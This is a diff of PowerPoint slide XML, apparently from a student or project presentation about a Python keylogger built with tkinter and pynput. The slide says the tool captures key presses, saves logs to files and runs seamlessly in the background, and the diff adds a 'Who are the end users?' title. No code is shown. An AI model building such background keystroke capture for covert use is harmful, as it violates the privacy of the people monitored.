+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Technical Overview</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Libraries Used</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Python, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>tkinter</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>pynput</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>, and </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>json</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Functionality</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Captures key presses and releases.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Saves logs to files for later analysis.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="285750" marR="0" lvl="0" indent="-285750" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
+              <a:buChar char="Ø"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Efficiency</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+              <a:spcBef>
+                <a:spcPct val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPct val="0"/>
+              </a:spcAft>
+              <a:buClrTx/>
+              <a:buSzTx/>
+              <a:buFontTx/>
+              <a:buChar char="•"/>
+              <a:tabLst/>
+            </a:pPr>
+            <a:r>
+              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+                <a:ln>
+                  <a:noFill/>
+                </a:ln>
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:effectLst/>
+                <a:latin typeface="Garamond" panose="02020404030301010803" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Lightweight and designed to run seamlessly in the background.</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
+              <a:ln>
+                <a:noFill/>
+              </a:ln>
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:effectLst/>
+              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -7922,366 +9913,25 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="object 2"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
+          <p:cNvPr id="5" name="object 5"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="752475" y="6486037"/>
-            <a:ext cx="1773555" cy="166370"/>
+            <a:off x="699452" y="891793"/>
+            <a:ext cx="5014595" cy="518159"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
           </a:prstGeom>
         </p:spPr>
         <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPts val="1275"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1100" spc="20" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>3/21/202</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>4</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" spc="130" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="50" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>A</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>nnu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="10" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>al</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-140" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>R</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="90" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>v</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>i</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="35" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>e</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1100" b="1" spc="15" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="2D83C3"/>
-                </a:solidFill>
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>w</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="object 3"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9353550" y="5362575"/>
-            <a:ext cx="457200" cy="457200"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="457200" h="457200">
-                <a:moveTo>
-                  <a:pt x="457200" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="457200"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="457200" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="42AF51"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="object 4"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6696075" y="1695450"/>
-            <a:ext cx="314325" cy="323850"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="314325" h="323850">
-                <a:moveTo>
-                  <a:pt x="314325" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="323850"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="314325" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D83C3"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="object 5"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="9353550" y="5895975"/>
-            <a:ext cx="180975" cy="180975"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="180975" h="180975">
-                <a:moveTo>
-                  <a:pt x="180975" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="0" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="180975"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="180975" y="0"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-          <a:solidFill>
-            <a:srgbClr val="2D936B"/>
-          </a:solidFill>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="6" name="object 6"/>
-          <p:cNvPicPr/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2" cstate="print"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1666875" y="6467475"/>
-            <a:ext cx="76200" cy="177800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="object 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="739775" y="1367853"/>
-            <a:ext cx="2811780" cy="300355"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
+          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
             <a:spAutoFit/>
           </a:bodyPr>
           <a:lstStyle/>
@@ -8291,76 +9941,104 @@
                 <a:spcPct val="100000"/>
               </a:lnSpc>
               <a:spcBef>
-                <a:spcPts val="100"/>
+                <a:spcPts val="130"/>
               </a:spcBef>
             </a:pPr>
             <a:r>
-              <a:rPr sz="1800" spc="-45" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>Teams</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1800" spc="-15" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
+              <a:rPr sz="3200" spc="25" dirty="0"/>
+              <a:t>W</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="-20" dirty="0"/>
+              <a:t>H</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="20" dirty="0"/>
+              <a:t>O</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="-235" dirty="0"/>
               <a:t> </a:t>
             </a:r>
             <a:r>
-              <a:rPr sz="1800" spc="10" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>cam</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1800" spc="-105" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
+              <a:rPr sz="3200" spc="-10" dirty="0"/>
+              <a:t>AR</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="15" dirty="0"/>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="-35" dirty="0"/>
               <a:t> </a:t>
             </a:r>
             <a:r>
-              <a:rPr sz="1800" spc="-5" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>add</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr sz="1800" spc="10" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
+              <a:rPr sz="3200" spc="-10" dirty="0"/>
+              <a:t>T</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="-15" dirty="0"/>
+              <a:t>H</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="15" dirty="0"/>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="-35" dirty="0"/>
               <a:t> </a:t>
             </a:r>
             <a:r>
-              <a:rPr sz="1800" spc="-5" dirty="0">
-                <a:latin typeface="Trebuchet MS"/>
-                <a:cs typeface="Trebuchet MS"/>
-              </a:rPr>
-              <a:t>wireframes</a:t>
-            </a:r>
-            <a:endParaRPr sz="1800">
-              <a:latin typeface="Trebuchet MS"/>
-              <a:cs typeface="Trebuchet MS"/>
-            </a:endParaRPr>
+              <a:rPr sz="3200" spc="-20" dirty="0"/>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="30" dirty="0"/>
+              <a:t>N</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="15" dirty="0"/>
+              <a:t>D</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="-45" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" dirty="0"/>
+              <a:t>U</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="10" dirty="0"/>
+              <a:t>S</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="-25" dirty="0"/>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="-10" dirty="0"/>
+              <a:t>R</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="3200" spc="5" dirty="0"/>
+              <a:t>S?</a:t>
+            </a:r>
+            <a:endParaRPr sz="3200" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="9" name="object 9"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
+          <p:cNvPr id="8" name="object 8"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="7"/>
+          </p:nvPr>
         </p:nvSpPr>
         <p:spPr>
-          <a:xfrm>
-            <a:off x="11277218" y="6473337"/>
-            <a:ext cx="228600" cy="191770"/>
-          </a:xfrm>
